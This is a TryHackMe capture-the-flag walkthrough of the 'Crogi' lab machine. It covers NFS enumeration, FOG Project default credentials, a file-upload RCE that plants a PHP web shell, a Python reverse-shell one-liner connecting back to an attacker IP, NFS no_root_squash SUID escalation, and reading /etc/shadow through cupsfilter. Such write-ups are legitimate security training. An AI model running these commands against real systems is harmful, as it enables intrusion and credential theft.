# TryHackMe-Crogi
## NMAP
```bash
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
443/tcp open ssl/https syn-ack ttl 63 Apache/2.4.29 (Ubuntu)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2049/tcp open nfs_acl syn-ack ttl 63 3 (RPC #100227)
3306/tcp open mysql syn-ack ttl 63 MySQL 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
| Thread ID: 89
| Capabilities flags: 63487
| Some Capabilities: InteractiveClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransaction
s, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, Speaks41ProtocolNe
w, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: ;sV4=wbeUX:W*gL$m{Bs
|_ Auth Plugin Name: mysql_native_password
42493/tcp open nlockmgr syn-ack ttl 63 1-4 (RPC #100021)
57597/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)
58527/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)
60677/tcp open mountd syn-ack ttl 63 1-3 (RPC #100005)
```
## PORT 2049 (NFS)
Since `nfs` is enabled we can see if there's are share available for us to mount , and running `showmount` will show which shares are available
We can now mount this using the `mount` command
If we navigate into folders we can see a `fog` file and we can see that there's something called fog project
We can serch for default creds for fog which are `fog:password`
Searching for exploits on google we do find one for `File Upload RCE`
## Foothold
So let's follow the steps to get remote code execution , first we need to create an empty file using the command show in the exploit
Make a variable named `cmd` which will save the value coming form the GET parameter named `cmd` and that command will be executed with `system` function , basically running any shell command
Then we have to server this file by hosting it on our machine and we need to include that request (http://ip/myshell) in base64 encoded form in a GET parameter named `file` of fog url
```
http://10.10.39.253:443/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzAuOC45NC42MC9teXNoZWxsCg==&arch=arm64
```
After making that request a confirmation will be show to install the kernel module
Here we need to change kernel name from `bzImage32` to `myshell.php`
Navigating to `/fog/service/ipxe/myshell.php?cmd=id`
We will have rce from which we can get a revere shell
```bash
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.94.60",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
Stabilizing the shell
## Rabbit hole
We can find fog database password from `/opt/fog/.fogsettings`
There's also another set of credentials but I am not sure for which service it's for but there is a usernamed `fogproject` so let's try for this user
This indeed was the right password but it immediately shows a message and brings us back to www-data shell , but we can actually runs commands as this user through `su fogproject -c id`
I tried to get sh shell instead of bash and it worked
But I couldn't do much from this user , so I went on and looked at the kernel version
Now at this point I am not gonna lie I got into a rabbit hole and tried to exploit the kernel version but couldn't get any of the exploits to work as all failed at finding subuid (don't know what it means )
## Privilege Escalation (1st method)
I should have run `linpeas` from the start and it would have saved my time because as I ran linpeas and found that `no_squash_root` was enabled
And this could be a secrity issue , by default on nfs share ,it we mount the share and whatever changes that we make in that share like uploading files or writing files it will be owned as `nfsnobody` or `nobody` even tho we are root on our host machine but if no_root_squash is enabled , whatever changes we make or upload any files that will be owned as root on the actual target machine so we can mount the share , copy the `bash` from our machine and make it a SUID , and that file will also be shown as being SUID binary owned by root on the actual machine (target machine)
So in order to see which share we have write access , we can read the `/etc/exports` file on the target machine
Let's mount `/images/dev` share again
Here what I have done is , mounted the share and in that share created a c program file which will set the SUID to 0 (which is for root user) and spawn the bash shell . After compiling the file we have to make that binary a SUID because when this binary executes it will be executed as a root user
Also to note that I had tried copying the bash binary , making it a SUID and then executing it but it didn't work as it was throwing an error related loading shared library
## Privilege Escalation (2nd method)
Checking the SUID binaries , we will find a binary named `cupsfilter`
CUPS in linux is used as a printing service in linux for printing files and cupsfilter is used for converting a file to a specific format , after the file is converting it sends the output to standard output , on to the screen. So we can abuse this by going to GTFOBINS
Running `/usr/sbin/cupsfilter -i application/octet-stream -m application/octet-stream /etc/shadow`
This will print the shadow file which holds all user's password hashses, in this way we can read the root flag as well but we won't get a shell through this method as we can only read files and since there's no ssh key in root user's .ssh directory we can't do much from here
## References
- https://www.exploit-db.com/exploits/49811
- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
- https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot
- https://man7.org/linux/man-pages/man8/cupsfilter.8.html
- https://gtfobins.github.io/gtfobins/cupsfilter/